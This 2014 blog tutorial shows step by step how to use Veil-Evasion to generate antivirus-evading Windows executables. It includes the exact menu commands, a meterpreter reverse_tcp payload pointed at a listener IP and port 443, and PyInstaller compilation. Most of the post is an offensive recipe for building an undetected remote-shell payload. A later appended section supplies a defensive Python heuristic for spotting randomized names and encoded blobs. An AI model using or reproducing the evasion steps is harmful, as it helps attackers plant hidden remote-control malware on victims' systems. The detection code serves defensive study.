Tuesday 23 September 2014

BYPASSING ANTIVIRUS USING VEIL-FRAMEWORK



Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.
Veil-Evasion is a tool that generates payload executables that bypass common antivirus solutions by creating each payload with randomness.

Installing Veil


USING KALI OR BACKTRACK

Kali download link:







To install, just type “apt-get update && apt-get install veil”.
To run the program, open a terminal and type “veil-evasion”.

This brings you to the main menu.
Then type the command “list” to obtain a list of available payloads:
[>] Please enter a command: use 27
[>] Please enter a command: set use_pyherion  Y
[>] Please enter a command: generate
Then wait while the shellcode is being generated.
Now we are going to select msfvenom by typing “1”.
[>] Please enter the number of your choice :  1
Enter metasploit payload: “windows/meterpreter/reverse_tcp”
 Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”
 Enter value for ‘LPORT': “443”
Press Enter, and Veil then asks for the name of our payload, in this case “payload”. Any name can be used.



We are going to use PyInstaller, which creates a .exe executable. To select it, type “1”.

[>] Please enter the number of your choice :  1
Then press Enter.
In the end, we can get our executable at “/root/Veil-output/compiled/”.
The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.
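
For a defender, the randomized names and encoded payloads described above are themselves a triage signal. The following added example (not part of the original post or of Veil) scores a Python source file for random-looking identifiers and long high-entropy string literals; the thresholds and both sample sources are constructed assumptions, not tuned detection values.

```python
import ast
import math
from collections import Counter

VOWELS = set("aeiouy")

def looks_random(name):
    """Heuristic (assumed thresholds): few vowels or a long consonant run."""
    letters = [c for c in name.lower() if c.isalpha()]
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < 0.15 or longest >= 5

def entropy(text):
    """Shannon entropy in bits per character."""
    return -sum(n / len(text) * math.log2(n / len(text)) for n in Counter(text).values())

def triage(source):
    """Score one Python source file by its defined names and string literals."""
    names, blobs = set(), 0
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
            names.add(node.name)
        elif isinstance(node, ast.arg):
            names.add(node.arg)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            names.add(node.id)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if len(node.value) >= 64 and entropy(node.value) > 4.5:
                blobs += 1  # long, high-entropy literal: likely an encoded blob
    flagged = sorted(n for n in names if looks_random(n))
    ratio = len(flagged) / len(names) if names else 0.0
    return {"ratio": ratio, "flagged": flagged, "blobs": blobs,
            "suspicious": ratio >= 0.5 or blobs > 0}

# Constructed samples: ordinary code versus code with randomized names and a blob.
CLEAN = "def average(values):\n    total = sum(values)\n    return total / len(values)\n"
BLOB = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
OBFUSCATED = ("def qZxvRtplKw(hTgbnmQs):\n    aKeRtpwQzm = len(hTgbnmQs)\n"
              "    return aKeRtpwQzm\nmNbvCxzLkj = qZxvRtplKw('" + BLOB + "')\n")

if __name__ == "__main__":
    for label, src in (("clean", CLEAN), ("obfuscated", OBFUSCATED)):
        print(label, triage(src))
```

Ordinary English identifiers with long consonant clusters can trip the per-name check, so the file-level ratio is what should feed a triage queue, alongside other signals.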
